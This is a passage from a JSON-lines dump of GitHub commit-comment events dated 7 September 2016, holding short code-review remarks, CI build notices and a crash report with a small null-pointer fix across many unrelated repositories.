{"id":"4526177984","type":"CommitCommentEvent","actor":{"login":"venero"},"repo":{"name":"wulinzhu/hmfs"},"payload":{"comment":{"id":18924752,"position":175,"line":223,"path":"fs/hmfs/file.c","commit_id":"a6778bd9cc9e8f07b954fdecd1081a45a3be236e","created_at":"2016-09-07T08:33:05Z","updated_at":"2016-09-07T08:33:05Z","body":"Why use both `file_update_time(filp);` and `inode->i_ctime = inode->i_mtime = CURRENT_TIME_SEC;` at the same time?"}},"created_at":"2016-09-07T08:33:05Z"}
{"id":"4526182290","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"sindresorhus/boxen"},"payload":{"comment":{"id":18924766,"position":null,"line":null,"path":null,"commit_id":"d7a92e39f29ba41378c4dba83ad8dd67b3f553d5","created_at":"2016-09-07T08:34:02Z","updated_at":"2016-09-07T08:34:02Z","body":"@aichholzer You should have told me and I would have happily let you do it ;)\r\n\r\n> Let me know if you need any help and I can continue from where you left it.\r\n\r\nHelp with that though? The above code is commited and done. If you see any other potential improvements, I would be happy to review."}},"created_at":"2016-09-07T08:34:02Z"}
{"id":"4526183274","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18924769,"position":null,"line":null,"path":null,"commit_id":"25c593cdc79ed3151480f79a14f4e222a557b792","created_at":"2016-09-07T08:34:16Z","updated_at":"2016-09-07T08:34:16Z","body":"Address*"}},"created_at":"2016-09-07T08:34:16Z"}
{"id":"4526185283","type":"CommitCommentEvent","actor":{"login":"SumeeraShakila"},"repo":{"name":"SumeeraShakila/TestGitRepo"},"payload":{"comment":{"id":18924777,"position":null,"line":null,"path":null,"commit_id":"ef4e7fbfd4758fd6cf9a6fb05890ae5261d5f064","created_at":"2016-09-07T08:34:41Z","updated_at":"2016-09-07T08:34:41Z","body":"// test"}},"created_at":"2016-09-07T08:34:41Z"}
{"id":"4526185736","type":"CommitCommentEvent","actor":{"login":"tobias-nitsche"},"repo":{"name":"getsentry/sentry-php"},"payload":{"comment":{"id":18924778,"position":null,"line":null,"path":null,"commit_id":"feed98771ac9d593c0a9f8355d28d2a8474c2353","created_at":"2016-09-07T08:34:47Z","updated_at":"2016-09-07T08:34:47Z","body":"Nice!"}},"created_at":"2016-09-07T08:34:47Z"}
{"id":"4526189657","type":"CommitCommentEvent","actor":{"login":"pbimpisidis"},"repo":{"name":"dfensgmbh/biz.dfch.PS.Appclusive.Client"},"payload":{"comment":{"id":18924788,"position":38,"line":139,"path":"it/KeyNameValue.Tests.ps1","commit_id":"8430ccfe9fcafd7ca07b4ab35788bf4cd8406539","created_at":"2016-09-07T08:35:37Z","updated_at":"2016-09-07T08:35:37Z","body":"@rufer7 exactly. but it starts earlier, if in line 138 I don't have the reconnection, on line 139 I get empty variable. seems strange to me that I have to reconnect for every update. for now I will keep the Enter-Appclusive lines."}},"created_at":"2016-09-07T08:35:37Z"}
{"id":"4526190613","type":"CommitCommentEvent","actor":{"login":"BtoBastian"},"repo":{"name":"BtoBastian/Javacord"},"payload":{"comment":{"id":18924793,"position":null,"line":null,"path":null,"commit_id":"b8def2cd93efe117ee048a9e9ae990dd4a9f9093","created_at":"2016-09-07T08:35:49Z","updated_at":"2016-09-07T08:35:49Z","body":"Oups...\r\nIt was issue #14 "}},"created_at":"2016-09-07T08:35:49Z"}
{"id":"4526199338","type":"CommitCommentEvent","actor":{"login":"chrisprice"},"repo":{"name":"ColinEberhardt/d3fc-annotation"},"payload":{"comment":{"id":18924812,"position":186,"line":173,"path":"README.md","commit_id":"b9b74e26ce9da35934111c281e6316aa35709b0f","created_at":"2016-09-07T08:37:40Z","updated_at":"2016-09-07T08:37:40Z","body":"I take `value` to mean something related to positioning the visual thing which will be passed through a scale. The prefixes we normally specify exist only to disambiguate between the different `value`s required. Therefore I don't think there should be a prefix on this. \r\n\r\nAdding the prefix in this case seems similar to prefixing `axis.scale` i.e. `axis.axisScale`.\r\n\r\nConvinced? 😄 "}},"created_at":"2016-09-07T08:37:40Z"}
{"id":"4526199616","type":"CommitCommentEvent","actor":{"login":"tomschr"},"repo":{"name":"SUSE/doc-sleha"},"payload":{"comment":{"id":18924813,"position":null,"line":null,"path":null,"commit_id":"b07d64898397d5f41bc1db6f62df761c4a0c2efb","created_at":"2016-09-07T08:37:44Z","updated_at":"2016-09-07T08:37:44Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;3Bcqiu2o&#x2F;68-ha-drbd-xml\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> ha_drbd.xml</a>"}},"created_at":"2016-09-07T08:37:44Z"}
{"id":"4526199718","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/Pale-Moon"},"payload":{"comment":{"id":18924814,"position":null,"line":null,"path":null,"commit_id":"11c9d19d93409a270d6045ff1209ce8c3c675232","created_at":"2016-09-07T08:37:45Z","updated_at":"2016-09-07T08:37:45Z","body":"This resolves #508."}},"created_at":"2016-09-07T08:37:45Z"}
{"id":"4526203605","type":"CommitCommentEvent","actor":{"login":"Infante007"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18924818,"position":null,"line":null,"path":null,"commit_id":"9ff12066ff67e2c53ceecdce86f1d2b3b24192eb","created_at":"2016-09-07T08:38:34Z","updated_at":"2016-09-07T08:38:34Z","body":"Esta es la aplicación de pago, para el mercado chino y sus tarjetas.\r\n¿Crees que valdrá para nosotros?\r\n¿La global no la tiene traducida?\r\nUn saludo"}},"created_at":"2016-09-07T08:38:34Z"}
{"id":"4526205783","type":"CommitCommentEvent","actor":{"login":"evilcatkimi"},"repo":{"name":"evilcatkimi/onepagetestapp"},"payload":{"comment":{"id":18924824,"position":66,"line":71,"path":"app/Http/Controllers/MemberController.php","commit_id":"f43584169854626c1e7d5c6a3cb7e5244189d07c","created_at":"2016-09-07T08:39:01Z","updated_at":"2016-09-07T08:39:01Z","body":"Yes, i used all post and get method for this one page app:\r\ni used GET mothod to get infomation of member and combined it with AngularJS like this pic :\r\n![z](https://cloud.githubusercontent.com/assets/16232598/18305241/d0e5ccc8-7510-11e6-8f96-bc05726abec0.jpg)\r\n\r\nif you don't have GET mothod, you can't.\r\nAnd ofcourse i used  POST method to send request and save information into the DB. :+1: "}},"created_at":"2016-09-07T08:39:01Z"}
{"id":"4526206040","type":"CommitCommentEvent","actor":{"login":"keepsilentu"},"repo":{"name":"keepsilentu/bin"},"payload":{"comment":{"id":18924826,"position":null,"line":null,"path":null,"commit_id":"18742ad100db8cd61d28295d413ba7e0520683fb","created_at":"2016-09-07T08:39:04Z","updated_at":"2016-09-07T08:39:04Z","body":"修改51"}},"created_at":"2016-09-07T08:39:04Z"}
{"id":"4526208594","type":"CommitCommentEvent","actor":{"login":"axelchalon"},"repo":{"name":"jolocom/little-sister"},"payload":{"comment":{"id":18924830,"position":15,"line":443,"path":"src/js/lib/agents/graph.js","commit_id":"dac01dc9c721d82525c35f5b2e78e351f5febd58","created_at":"2016-09-07T08:39:35Z","updated_at":"2016-09-07T08:39:35Z","body":"aha, thanks!"}},"created_at":"2016-09-07T08:39:35Z"}
{"id":"4526208637","type":"CommitCommentEvent","actor":{"login":"sanderjo"},"repo":{"name":"sabnzbd/sabnzbd"},"payload":{"comment":{"id":18924831,"position":null,"line":null,"path":null,"commit_id":"1157e498f01a787dff01e9ab3fb5610d60b60611","created_at":"2016-09-07T08:39:36Z","updated_at":"2016-09-07T08:39:36Z","body":"> @sanderjo The protocol is called NNTP, not NTTP.\r\n\r\n@Safihre Can you change that in the title of this thread / patch?"}},"created_at":"2016-09-07T08:39:36Z"}
{"id":"4526208924","type":"CommitCommentEvent","actor":{"login":"dharmit"},"repo":{"name":"dharmit/che"},"payload":{"comment":{"id":18924832,"position":46,"line":46,"path":"Dockerfile.centos","commit_id":"2ab1f19d23cd4dd176e60ecbe68e7e1ba56c822b","created_at":"2016-09-07T08:39:38Z","updated_at":"2016-09-07T08:39:38Z","body":"@l0rd on CentOS 7 image, GID 50 is reserved for FTP which prevents me from adding a group for `docker4mac` with GID 50. Is it absolutely required to keep it GID 50?"}},"created_at":"2016-09-07T08:39:38Z"}
{"id":"4526208955","type":"CommitCommentEvent","actor":{"login":"tomschr"},"repo":{"name":"SUSE/doc-sleha"},"payload":{"comment":{"id":18924833,"position":null,"line":null,"path":null,"commit_id":"b07d64898397d5f41bc1db6f62df761c4a0c2efb","created_at":"2016-09-07T08:39:39Z","updated_at":"2016-09-07T08:39:39Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;GpmVpBeN&#x2F;136-final-checks-prio-3-nfs-quick\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Final Checks Prio 3 (NFS Quick)</a>"}},"created_at":"2016-09-07T08:39:39Z"}
{"id":"4526210291","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"MrMC/mrmc"},"payload":{"comment":{"id":18924837,"position":null,"line":null,"path":null,"commit_id":"71aab9098eeb85767bf76a6294c9b3780bdb73ea","created_at":"2016-09-07T08:39:56Z","updated_at":"2016-09-07T08:39:56Z","body":"FWIW, looks like I inadvertenly already removed this one, and dyloading was fine, so I assume versioning does not actually matter in that case..."}},"created_at":"2016-09-07T08:39:56Z"}
{"id":"4526210718","type":"CommitCommentEvent","actor":{"login":"dinosaadeh"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":18924838,"position":11,"line":178,"path":"core/src/com/smb215team/barjis/game/GameController.java","commit_id":"3476027b4139814f16d2201585311c14b5047f66","created_at":"2016-09-07T08:40:01Z","updated_at":"2016-09-07T08:40:01Z","body":"no, not explain.. I understand it.. I read it.. just put spacing to make\nthe code clean and readable.\n"}},"created_at":"2016-09-07T08:40:01Z"}
{"id":"4526215881","type":"CommitCommentEvent","actor":{"login":"tmenjo"},"repo":{"name":"tmenjo/tgt"},"payload":{"comment":{"id":18924844,"position":22,"line":1013,"path":"usr/bs_sheepdog.c","commit_id":"5259ce33c1ab047958cc3d4a5388fbfe4a01476c","created_at":"2016-09-07T08:41:02Z","updated_at":"2016-09-07T08:41:02Z","body":"I think this should be `check == 1`."}},"created_at":"2016-09-07T08:41:02Z"}
{"id":"4526217033","type":"CommitCommentEvent","actor":{"login":"tuananhpham94"},"repo":{"name":"evilcatkimi/onepagetestapp"},"payload":{"comment":{"id":18924850,"position":66,"line":71,"path":"app/Http/Controllers/MemberController.php","commit_id":"f43584169854626c1e7d5c6a3cb7e5244189d07c","created_at":"2016-09-07T08:41:18Z","updated_at":"2016-09-07T08:41:18Z","body":"No, this getEdit method is to save information on DB but not to show the view, can you check again ?"}},"created_at":"2016-09-07T08:41:18Z"}
{"id":"4526217362","type":"CommitCommentEvent","actor":{"login":"fridde"},"repo":{"name":"gpodder/gpodder"},"payload":{"comment":{"id":18924851,"position":null,"line":null,"path":null,"commit_id":"0d5520a4622c7ff61b7931a07513e17f7df389d9","created_at":"2016-09-07T08:41:21Z","updated_at":"2016-09-07T08:41:21Z","body":"Would you mind marking https://bugs.gpodder.org/show_bug.cgi?id=2023 as fixed?"}},"created_at":"2016-09-07T08:41:21Z"}
{"id":"4526218647","type":"CommitCommentEvent","actor":{"login":"chrisprice"},"repo":{"name":"ColinEberhardt/d3fc-annotation"},"payload":{"comment":{"id":18924856,"position":222,"line":209,"path":"README.md","commit_id":"b9b74e26ce9da35934111c281e6316aa35709b0f","created_at":"2016-09-07T08:41:38Z","updated_at":"2016-09-07T08:41:38Z","body":"ARGH. Fixed."}},"created_at":"2016-09-07T08:41:38Z"}
{"id":"4526221406","type":"CommitCommentEvent","actor":{"login":"Ozymandias81"},"repo":{"name":"Realm667/WolfenDoom"},"payload":{"comment":{"id":18924867,"position":null,"line":null,"path":null,"commit_id":"ca7a21df28d14ea54a56f9ee33e7dd5983436563","created_at":"2016-09-07T08:42:14Z","updated_at":"2016-09-07T08:42:14Z","body":"Ok it seems to work very well now... I had to left some garabge code in order to avoid possible glitches within the actor and the stealth system, because I wasn't exactly aware of what was happening there on Pan state... But now that I've finally sleep a bit I figured it out that it was just a crap solution to just copy-paste the Pan state without the CallACS row and now it works perfectly as intended. Thanks a lot AFA! :muscle: \r\n\r\nWithout bloom, all monsters killed (yeah I was testing this way last night)...\r\n![screenshot_doom_20160907_103454](https://cloud.githubusercontent.com/assets/11136108/18305378/96392db4-74e7-11e6-931e-990d54a01b1f.png)\r\n...and with bloom effect on, always without monsters.\r\n![screenshot_doom_20160907_103705](https://cloud.githubusercontent.com/assets/11136108/18305379/963d65f0-74e7-11e6-91a3-7233111d3852.png)\r\n"}},"created_at":"2016-09-07T08:42:14Z"}
{"id":"4526225901","type":"CommitCommentEvent","actor":{"login":"paulmenzel"},"repo":{"name":"broadgsa/gatk"},"payload":{"comment":{"id":18924878,"position":null,"line":null,"path":null,"commit_id":"f7c058c861d2580b05bcb77b2b8b95fedb41b5eb","created_at":"2016-09-07T08:43:10Z","updated_at":"2016-09-07T08:43:10Z","body":"What happened here? No file was changed."}},"created_at":"2016-09-07T08:43:10Z"}
{"id":"4526226503","type":"CommitCommentEvent","actor":{"login":"chrisprice"},"repo":{"name":"ColinEberhardt/d3fc-annotation"},"payload":{"comment":{"id":18924883,"position":230,"line":217,"path":"README.md","commit_id":"b9b74e26ce9da35934111c281e6316aa35709b0f","created_at":"2016-09-07T08:43:15Z","updated_at":"2016-09-07T08:43:15Z","body":"They are intentionally not called that to reflect that the values are not passed through the scales. The assumption being that crosshairs are likely to be positioned in pixel co-ordinates because they're driven by interaction. Does that make sense or do you still think it should be changed?\r\n\r\n"}},"created_at":"2016-09-07T08:43:15Z"}
{"id":"4526228852","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18924887,"position":null,"line":null,"path":null,"commit_id":"e95f55034029814f15a05bdfa5f6b5cb3f7c20d8","created_at":"2016-09-07T08:43:40Z","updated_at":"2016-09-07T08:43:40Z","body":"@cyberium\r\ncrash related to this commit. \r\nMap::AddObjectToRemoveList() call CleanupsBeforeDelete(), and before next World update creature remains in the world with nulled ai pointer.\r\n\r\n___AiDelayEventAround::Execute___+4D  e:\\mangos\\335\\src\\game\\worldobjectevents.cpp line 486\r\nEventProcessor::Update+63  e:\\mangos\\335\\src\\framework\\utilities\\eventprocessor.cpp line 61\r\nWorldObjectEventProcessor::Update+1B  e:\\mangos\\335\\src\\game\\worldobjectevents.cpp line 47\r\nUnit::UpdateEvents+27  e:\\mangos\\335\\src\\game\\unit.cpp line 21740\r\nUnit::Update+23  e:\\mangos\\335\\src\\game\\unit.cpp line 373\r\nCreature::Update+C7  e:\\mangos\\335\\src\\game\\creature.cpp line 630\r\nWorldObject::UpdateWithTimeDiff+40  e:\\mangos\\335\\src\\game\\object.cpp line 2528\r\n(this is not \"clear\" mangos, but works the same =)\r\n\r\nfix:\r\nneeds check pReceiver->AI() here:\r\nhttps://github.com/cmangos/mangos-wotlk/blob/master/src/game/AI/CreatureAI.cpp#L204\r\n\r\n```\r\n        if (Creature* pReceiver = m_owner.GetMap()->GetAnyTypeCreature(*itr))\r\n        {\r\n            _______if (CreatureAI* ai = pReceiver->AI())_________\r\n            {\r\n                ai->ReceiveAIEvent(m_eventType, &m_owner, pInvoker, m_miscValue);\r\n                // Special case for type 0 (call-assistance)\r\n                if (m_eventType == AI_EVENT_CALL_ASSISTANCE && pInvoker && pReceiver->CanAssistTo(&m_owner, pInvoker))\r\n                {\r\n                    pReceiver->SetNoCallAssistance(true);\r\n                    ai->AttackStart(pInvoker);\r\n                }\r\n            }\r\n        }\r\n```\r\n"}},"created_at":"2016-09-07T08:43:40Z"}
{"id":"4526241537","type":"CommitCommentEvent","actor":{"login":"vszakats"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":18924911,"position":null,"line":null,"path":null,"commit_id":"8fa20da8e1a2f38440610221576ff027eb0c7e5e","created_at":"2016-09-07T08:46:10Z","updated_at":"2016-09-07T08:46:10Z","body":"I was meant to create a PR for this using a customary workflow without\r\nrealising in time that as a GitHub curl team member, this now works differently.\r\nHence the direct commit. Please let's discuss/revert this modification in \r\ncase it is not ready for prime-time.\r\n\r\n/cc @bagder"}},"created_at":"2016-09-07T08:46:10Z"}
{"id":"4526246768","type":"CommitCommentEvent","actor":{"login":"tuyethoa08041997"},"repo":{"name":"tuyethoa08041997/rfid"},"payload":{"comment":{"id":18924922,"position":4,"line":81,"path":"MFRC522.h","commit_id":"c7b8a0624f775449b50c6d0325a7851d4210ac0a","created_at":"2016-09-07T08:47:12Z","updated_at":"2016-09-07T08:47:12Z","body":"Add a way to change the SPI speed"}},"created_at":"2016-09-07T08:47:12Z"}
{"id":"4526247272","type":"CommitCommentEvent","actor":{"login":"wsnipex"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18924924,"position":null,"line":null,"path":null,"commit_id":"2cb1ef00750dd07e73c18bfe1fe3f7ddae9628fb","created_at":"2016-09-07T08:47:17Z","updated_at":"2016-09-07T08:47:17Z","body":"can you please try https://github.com/wsnipex/xbmc/commit/d9e5024818fe1d2c8a4c2615da7e66da8403b49f"}},"created_at":"2016-09-07T08:47:17Z"}
{"id":"4526247916","type":"CommitCommentEvent","actor":{"login":"chrisprice"},"repo":{"name":"ColinEberhardt/d3fc-annotation"},"payload":{"comment":{"id":18924927,"position":30,"line":30,"path":"src/gridline.js","commit_id":"b9b74e26ce9da35934111c281e6316aa35709b0f","created_at":"2016-09-07T08:47:24Z","updated_at":"2016-09-07T08:47:24Z","body":"I changed my mind 😄 I suppose canvas now suitably addresses any performance issues?"}},"created_at":"2016-09-07T08:47:24Z"}
{"id":"4526256151","type":"CommitCommentEvent","actor":{"login":"tuyethoa08041997"},"repo":{"name":"tuyethoa08041997/rfid"},"payload":{"comment":{"id":18924947,"position":40,"line":331,"path":"MFRC522.h","commit_id":"c7b8a0624f775449b50c6d0325a7851d4210ac0a","created_at":"2016-09-07T08:49:09Z","updated_at":"2016-09-07T08:49:09Z","body":"Make use of PCD_Register, no need to apply mask on reg anymore"}},"created_at":"2016-09-07T08:49:09Z"}
{"id":"4526256376","type":"CommitCommentEvent","actor":{"login":"rufer7"},"repo":{"name":"dfensgmbh/biz.dfch.PS.Appclusive.Client"},"payload":{"comment":{"id":18924948,"position":38,"line":139,"path":"it/KeyNameValue.Tests.ps1","commit_id":"8430ccfe9fcafd7ca07b4ab35788bf4cd8406539","created_at":"2016-09-07T08:49:12Z","updated_at":"2016-09-07T08:49:12Z","body":"@pbimpisidis please do not keep the `Enter-Appclusive` lines but replace with use Push- and Pop-ChangeTracker Cmdlets"}},"created_at":"2016-09-07T08:49:12Z"}
{"id":"4526256843","type":"CommitCommentEvent","actor":{"login":"Jofagi"},"repo":{"name":"pocki/chocolateypackages"},"payload":{"comment":{"id":18924949,"position":null,"line":null,"path":null,"commit_id":"ef816599d59f0defbd8a6b9c39e08f5cdfeba7fa","created_at":"2016-09-07T08:49:17Z","updated_at":"2016-09-07T08:49:17Z","body":"I just noticed that the `projectUrl` lands you on an error page. Unfortunately I cannot provide you with the working one.\r\n\r\nI got here because I was trying to find out, how to get the latest redistributable package. Can you please tell me, how you do it? The latest Package I was able to find via the MS website, is 14.0.23918.0."}},"created_at":"2016-09-07T08:49:17Z"}
{"id":"4526259108","type":"CommitCommentEvent","actor":{"login":"aszczecinski"},"repo":{"name":"BartlomiejAdamiak/JavaApiDoGier"},"payload":{"comment":{"id":18924954,"position":null,"line":null,"path":null,"commit_id":"3f95a756a85d56769f2d0138c87ba093b89b78bb","created_at":"2016-09-07T08:49:43Z","updated_at":"2016-09-07T08:49:43Z","body":"Pakiety raczej powinny zaczynać się od małej litery, dopiero klasy od dużej. \r\n-> Control\r\n-> View\r\nZamienić na:\r\ncontrol\r\nview\r\n\r\nNie mogę wrzucić commita z pracy, poblokowane wszystko :P"}},"created_at":"2016-09-07T08:49:43Z"}
{"id":"4526260044","type":"CommitCommentEvent","actor":{"login":"tuyethoa08041997"},"repo":{"name":"tuyethoa08041997/rfid"},"payload":{"comment":{"id":18924956,"position":15,"line":274,"path":"MFRC522.h","commit_id":"c7b8a0624f775449b50c6d0325a7851d4210ac0a","created_at":"2016-09-07T08:49:55Z","updated_at":"2016-09-07T08:49:55Z","body":"Put it here rather than have a const"}},"created_at":"2016-09-07T08:49:55Z"}
{"id":"4526265491","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18924970,"position":null,"line":null,"path":null,"commit_id":"15dceae786711c81d38b054c7ade27372c103d1c","created_at":"2016-09-07T08:51:02Z","updated_at":"2016-09-07T08:51:02Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 940](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12799&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T08:51:02Z"}
{"id":"4526268069","type":"CommitCommentEvent","actor":{"login":"bagder"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":18924975,"position":null,"line":null,"path":null,"commit_id":"8fa20da8e1a2f38440610221576ff027eb0c7e5e","created_at":"2016-09-07T08:51:33Z","updated_at":"2016-09-07T08:51:33Z","body":"Well, you don't need to have a different work flow. You can still do pull requests for discussions etc and we encourage that for larger  or \"sensitive\" changes. In this case, I'm perfectly fine with us just switching to SHA-256 here."}},"created_at":"2016-09-07T08:51:33Z"}
{"id":"4526272972","type":"CommitCommentEvent","actor":{"login":"tuyethoa08041997"},"repo":{"name":"tuyethoa08041997/rfid"},"payload":{"comment":{"id":18924986,"position":415,"line":440,"path":"MFRC522.cpp","commit_id":"c7b8a0624f775449b50c6d0325a7851d4210ac0a","created_at":"2016-09-07T08:52:31Z","updated_at":"2016-09-07T08:52:31Z","body":"I think for loop is easier to read..."}},"created_at":"2016-09-07T08:52:31Z"}
{"id":"4526275645","type":"CommitCommentEvent","actor":{"login":"tuyethoa08041997"},"repo":{"name":"tuyethoa08041997/rfid"},"payload":{"comment":{"id":18924989,"position":192,"line":178,"path":"MFRC522.cpp","commit_id":"c7b8a0624f775449b50c6d0325a7851d4210ac0a","created_at":"2016-09-07T08:52:59Z","updated_at":"2016-09-07T08:52:59Z","body":"I think for loop is easier to read..."}},"created_at":"2016-09-07T08:52:59Z"}
{"id":"4526276821","type":"CommitCommentEvent","actor":{"login":"jamiltz"},"repo":{"name":"couchbaselabs/mobile-training-todo"},"payload":{"comment":{"id":18924994,"position":52,"line":52,"path":"dotnet/Training.Core/Models/TaskImageModel.cs","commit_id":"783a604b5c96f2c6e502d7fbbf75f4f5278b9bc6","created_at":"2016-09-07T08:53:14Z","updated_at":"2016-09-07T08:53:14Z","body":"We'll have a pre-built database option as well in the training. There's a \"Download the pre-built database\" link on this page http://developer.couchbase.com/documentation/mobile/1.3/develop/training/using-the-database/index.html which contains a list called \"Groceries\" with a 20 tasks in it if I remember correctly."}},"created_at":"2016-09-07T08:53:14Z"}
{"id":"4526279560","type":"CommitCommentEvent","actor":{"login":"tuyethoa08041997"},"repo":{"name":"tuyethoa08041997/rfid"},"payload":{"comment":{"id":18925001,"position":155,"line":153,"path":"MFRC522.cpp","commit_id":"c7b8a0624f775449b50c6d0325a7851d4210ac0a","created_at":"2016-09-07T08:53:46Z","updated_at":"2016-09-07T08:53:46Z","body":"Sometime we will need it."}},"created_at":"2016-09-07T08:53:46Z"}
{"id":"4526280921","type":"CommitCommentEvent","actor":{"login":"tuyethoa08041997"},"repo":{"name":"tuyethoa08041997/rfid"},"payload":{"comment":{"id":18925003,"position":93,"line":111,"path":"MFRC522.cpp","commit_id":"c7b8a0624f775449b50c6d0325a7851d4210ac0a","created_at":"2016-09-07T08:54:02Z","updated_at":"2016-09-07T08:54:02Z","body":"Faster and smaller"}},"created_at":"2016-09-07T08:54:02Z"}
{"id":"4526285723","type":"CommitCommentEvent","actor":{"login":"RyanTaite"},"repo":{"name":"RyanTaite/Media-Database"},"payload":{"comment":{"id":18925011,"position":null,"line":null,"path":null,"commit_id":"8541cc5272c7e61f84073fe0a3a1d82168722922","created_at":"2016-09-07T08:55:00Z","updated_at":"2016-09-07T08:55:00Z","body":"I also made the Add Item form a singleton so you wouldn't have multiple Add Item forms open at the same time. I feel like it's safer of the two options."}},"created_at":"2016-09-07T08:55:00Z"}
{"id":"4526287257","type":"CommitCommentEvent","actor":{"login":"Speronowa"},"repo":{"name":"Speronowa/Rep-v1-Hello-World.-"},"payload":{"comment":{"id":18925013,"position":null,"line":null,"path":null,"commit_id":"7db7d7e3f10b284a8b95009806dd7d949c7316d8","created_at":"2016-09-07T08:55:19Z","updated_at":"2016-09-07T08:55:19Z","body":"comment"}},"created_at":"2016-09-07T08:55:19Z"}
{"id":"4526289861","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925029,"position":null,"line":null,"path":null,"commit_id":"8ba4e1a2bd8a18e703f0e7a726dc12201d887dc2","created_at":"2016-09-07T08:55:48Z","updated_at":"2016-09-07T08:55:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 941](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12802&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T08:55:48Z"}
{"id":"4526290692","type":"CommitCommentEvent","actor":{"login":"Hypfer"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18925043,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T08:55:58Z","updated_at":"2016-09-07T08:55:58Z","body":"https://i.imgur.com/XPTEg2A.png\r\n\r\nNo, didn't fix it."}},"created_at":"2016-09-07T08:55:58Z"}
{"id":"4526299878","type":"CommitCommentEvent","actor":{"login":"Asunny-ren"},"repo":{"name":"Asunny-ren/workDetail"},"payload":{"comment":{"id":18925081,"position":null,"line":null,"path":null,"commit_id":"a1d5514c442995b099d24cb12507495cfdae0ca4","created_at":"2016-09-07T08:57:46Z","updated_at":"2016-09-07T08:57:46Z","body":"简直就是奇葩"}},"created_at":"2016-09-07T08:57:46Z"}
{"id":"4526304783","type":"CommitCommentEvent","actor":{"login":"raynaya"},"repo":{"name":"capitalone/Hygieia"},"payload":{"comment":{"id":18925090,"position":null,"line":null,"path":null,"commit_id":"d14dfca2b8142c1925ac7d53ced4197e2f25e8e3","created_at":"2016-09-07T08:58:45Z","updated_at":"2016-09-07T08:58:45Z","body":"@amitmawkin  : After these changes, it seems like we have to add dbhostport property in all the configuration files. Is that correct ? "}},"created_at":"2016-09-07T08:58:45Z"}
{"id":"4526308930","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925096,"position":null,"line":null,"path":null,"commit_id":"15dceae786711c81d38b054c7ade27372c103d1c","created_at":"2016-09-07T08:59:33Z","updated_at":"2016-09-07T08:59:33Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 940](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12799&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:31"}},"created_at":"2016-09-07T08:59:33Z"}
{"id":"4526309238","type":"CommitCommentEvent","actor":{"login":"mountkin"},"repo":{"name":"nicescale/coreos-overlay"},"payload":{"comment":{"id":18925098,"position":null,"line":null,"path":null,"commit_id":"cafdbceaf985cdc0240d85a8e8a176236a35cee7","created_at":"2016-09-07T08:59:36Z","updated_at":"2016-09-07T08:59:36Z","body":"应该是--bip，少了个-， revert了吧，只有阿里云需要这个，放到阿里云分支里"}},"created_at":"2016-09-07T08:59:36Z"}
{"id":"4526316552","type":"CommitCommentEvent","actor":{"login":"schokoTT"},"repo":{"name":"ViolyS/RayUI_VS"},"payload":{"comment":{"id":18925113,"position":null,"line":null,"path":null,"commit_id":"e9ddcad950a788cc528c02980b5cc556a3d5b641","created_at":"2016-09-07T09:01:01Z","updated_at":"2016-09-07T09:01:01Z","body":"你还真是勤奋。。。"}},"created_at":"2016-09-07T09:01:01Z"}
{"id":"4526317537","type":"CommitCommentEvent","actor":{"login":"unintendedbear"},"repo":{"name":"geneura-papers/2015_books"},"payload":{"comment":{"id":18925114,"position":null,"line":null,"path":null,"commit_id":"34fdeb0090aee4e828fb484c5568fc1a4a1d9fcd","created_at":"2016-09-07T09:01:11Z","updated_at":"2016-09-07T09:01:11Z","body":"Ok, developed regression models, will change that.\r\nWith respect to the other suggestions:\r\n\r\n> I don't understand why the dashed line meaning (available data) applies also to the expertise knowledge and to the prediction, I think these are different concepts and maybe these boxes should be different (not dashed, for instance). ;)\r\n\r\nI can change \"Available Data\" for \"Available Knowledge\" to cover them both. If you want to further differentiate, please tell me with what names, though this would complicate more the Figure.\r\n\r\n> Not all the pre-sales data are 'part of the book', I mean, these data are those which can be known in advance the book is launched, but in our case, they are also things like the number of selling points, the price, the binding, or the weeks on sale, which are set by the publishing company. However, I don't exactly know how to show this in the graph without complicating it too much... has anybody an idea to show this? Otherwise, maybe it could remain as it is now.\r\n\r\nAgain, probably the best term is \"Available Knowledge\", in any place in the Figure it is said that the data comes exactly from the source, but can be inferred from the figure that is the information that it is known at every step. Anyway, I'll change the label.\r\n\r\n> This is a stupid thing, I know, but I see the new box/table a bit different from the rest, maybe the 